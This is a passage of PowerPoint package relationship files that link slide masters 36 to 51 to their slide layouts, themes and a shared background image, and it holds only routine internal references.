Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout341.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout359.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout358.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout357.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout356.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout355.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout354.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout353.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout352.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout360.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout351.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout369.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout368.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout367.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout366.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout365.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout364.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout363.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout362.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout370.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout361.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout379.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout378.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout377.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout376.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout375.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout374.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout373.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout372.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout371.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout389.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout388.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout387.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout386.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout385.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout384.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout383.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout382.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout390.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout399.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout398.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout397.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout396.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout395.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout392.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout400.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout391.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout409.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout408.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout407.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout406.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout405.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout404.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout403.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout402.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout410.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout401.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout419.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout418.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout417.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout416.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout415.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout414.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout413.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout412.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout420.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout411.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout429.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout427.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout426.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout425.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout424.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout423.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout422.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout430.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout421.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout439.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout438.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout437.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout436.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout435.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout434.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout433.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout432.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout440.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout431.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout449.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout448.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout447.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout446.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout445.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout444.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout443.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout442.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout450.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout441.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout459.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout458.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout457.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout456.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout455.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout454.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout453.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout452.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme46.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout460.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout451.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout469.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout468.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout467.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout466.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout465.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout464.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout463.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout462.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme47.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout470.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout461.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout479.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout478.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout477.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout476.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout475.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout474.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout473.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout472.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme48.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout480.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout471.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout489.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout488.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout487.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout486.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout485.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout484.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout483.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout482.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme49.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout490.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout48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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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_rels/slideMaster50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout499.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout498.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout497.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout496.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout495.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout494.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout493.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout492.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme50.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout500.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout491.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout509.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout508.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout507.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout506.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout505.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout504.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout503.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" 